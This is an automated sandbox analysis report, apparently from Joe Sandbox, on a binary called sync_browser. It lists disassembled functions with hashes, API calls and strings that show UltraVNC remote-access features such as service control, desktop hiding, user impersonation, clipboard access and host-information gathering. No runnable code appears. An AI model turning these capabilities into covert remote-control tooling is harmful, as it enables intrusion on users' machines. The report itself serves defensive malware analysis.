                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                                    • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 1729393483-4131161223
                                                                    • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                    • Instruction ID: a47f77b6efd51d6e425d5bf55459e7cd25c17de6151842036b05247f22b6f38d
                                                                    • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                    • Instruction Fuzzy Hash: D8B1CF32A0869A86FB608F25A8407BD73A4FF84754F480236DA5E97A84DF3DE527C740
                                                                    Function 00007FF6DC0D9740 Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 246libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                                    • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                                    • API String ID: 524771730-2664985301
                                                                    • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                    • Instruction ID: 935dbd310b567dd9ef74700a5893433e3f3de814c9b9275450fdae9e71b7da90
                                                                    • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                    • Instruction Fuzzy Hash: 90D13A35A09B9A95E7548B25AD4066D37A4FB88364F404237DA6DC3BA0DF3CE53BC701
                                                                    Function 00007FF6DC0D2E40 Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95serviceCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32 ref: 00007FF6DC0D2E5D
                                                                    • OpenServiceA.ADVAPI32 ref: 00007FF6DC0D2EAD
                                                                    • GetLastError.KERNEL32 ref: 00007FF6DC0D2EBB
                                                                    • CloseServiceHandle.ADVAPI32 ref: 00007FF6DC0D2EE0
                                                                      • Part of subcall function 00007FF6DC0CA040: OpenInputDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA07A
                                                                      • Part of subcall function 00007FF6DC0CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC0CA083
                                                                      • Part of subcall function 00007FF6DC0CA040: GetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA08B
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0A6
                                                                      • Part of subcall function 00007FF6DC0CA040: MessageBoxA.USER32 ref: 00007FF6DC0CA0B7
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0C2
                                                                      • Part of subcall function 00007FF6DC0CA040: CloseDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                                    • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                                    • API String ID: 1921882253-4018834470
                                                                    • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                    • Instruction ID: 12f1013cfeb58310affb623ab323bb737f2ef511d333c2daecc975dcdd93bc01
                                                                    • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                    • Instruction Fuzzy Hash: 31414221A0C66F82FA159B11EC542BC2365FF89B94F440037D91EC6654EF3DE96B8741
                                                                    Function 00007FF6DC0C1AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                                    • String ID:
                                                                    • API String ID: 1939172783-0
                                                                    • Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                    • Instruction ID: 07f7945227602fac20e7bf4f47f689751424a50b27a3cdc52cc6672e7fa6c30e
                                                                    • Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                    • Instruction Fuzzy Hash: AE812A21A0975A86EA54AF22AE5026D23A8FF45B90F044136DE5EC77A1EF3CE476C704
                                                                    Function 00007FF6DC0CA910 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6DC0CAB1D
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6DC0CA9BB
                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6DC0CA97B
                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6DC0CA9E6
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF6DC0CAA26
                                                                    • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6DC0CAAE1
                                                                    • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF6DC0CA94D
                                                                    • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6DC0CAB3F
                                                                    • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF6DC0CAA4D
                                                                    • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6DC0CAAC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                    • API String ID: 2777246624-1480653996
                                                                    • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                    • Instruction ID: 83d2f112a6f590d9628eff7fc9ad0c77b7ecef529842a03d78eac27ff0912390
                                                                    • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                    • Instruction Fuzzy Hash: F6514A60E1C59F85F7509B65AE14BFD26A5AFA4308F404233D80EC36A1EF2DA53BC751
                                                                    Function 00007FF6DC0EC2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF6DC0EC455
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF6DC0EC2F4
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF6DC0EC43D
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF6DC0EC3DC
                                                                    • g, xrefs: 00007FF6DC0EC31B
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF6DC0EC37E
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF6DC0EC3A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter
                                                                    • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                    • API String ID: 2978645861-1267036565
                                                                    • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                    • Instruction ID: dfb3ead1b480a8b94132861ef2a53494bbb282e3effb7c56a3bf0e042b2e8e69
                                                                    • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                    • Instruction Fuzzy Hash: 59519061A5CA9A84FB549B21AC187FD23A9FF89790F440133D95EC2290DF3EE52BC740
                                                                    Function 00007FF6DC0E8A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                    • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                    • API String ID: 1264956880-3227535004
                                                                    • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                    • Instruction ID: 3117a45466bcd92f60b6b381fbf722000719ac5bc5e29d18bcc3473b6da0819a
                                                                    • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                    • Instruction Fuzzy Hash: D9A1D7326586AA8AD744DF16E844A6E77ACFB89B90F015136EE5E83750CF3DD816CB00
                                                                    Function 00007FF6DC0C7A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                    • API String ID: 171970310-1756215141
                                                                    • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                    • Instruction ID: 00dca289dfed22bc60de784e6d48cde58d28d6ae2d7a449b9e5b8354cc8bfebd
                                                                    • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                    • Instruction Fuzzy Hash: 68B1A321A0869A85EB608B3999406BD37A0FB447B0F444337E67EC7AD5DF2DE527C710
                                                                    Function 00007FF6DC0C7A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                    • API String ID: 171970310-18614430
                                                                    • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                    • Instruction ID: 1ba1d7b916348d8a42ebac2ac481d80f53033d6d89fe4e0ea95d8eed65dd7c83
                                                                    • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                    • Instruction Fuzzy Hash: AAB1A321A0869A85EB608B3999406BD37A0FB447B0F444337E67EC7AD5DF2DE52BC710
                                                                    Function 00007FF6DC0C7B37 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                    • API String ID: 171970310-1760265636
                                                                    • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                    • Instruction ID: 71151988f4fcc38ed91e6e312ec49a9db9232a785175a689972349898eee86b4
                                                                    • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                    • Instruction Fuzzy Hash: 79B19221A0869A85EB608B3999406BD37A0FB447B4F404337E67EC7AD5DF2DE527C710
                                                                    Function 00007FF6DC0C79E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
